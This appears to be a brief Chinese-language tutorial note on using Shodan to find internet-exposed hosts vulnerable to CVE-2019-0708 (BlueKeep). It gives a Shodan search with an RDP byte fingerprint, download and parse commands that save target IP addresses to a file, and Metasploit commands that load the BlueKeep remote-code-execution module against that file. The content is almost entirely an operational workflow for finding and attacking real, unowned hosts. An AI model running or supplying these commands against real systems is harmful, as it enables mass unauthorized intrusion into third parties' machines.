shodan(二)
查找cve-2019-0708
shodan search --limit 10 --fields ip_str,port '"x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
十六进制字符串(类似于指纹的方式去找)
msf:
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
check
shodan download 0708 -- limit 10 -- fields ip_str,port '"x03\x00\x00\x0b
\x06\xd0\x00\x00\x124\x00"'(删掉过滤信息)
shodan parse -h(查看帮助文档)
shodan parse -- fields ip str 0708
shodan download -h(查看帮助文档)
shodan parse -- fields ip_str 0708 >0708. txt(解压到0708.txt)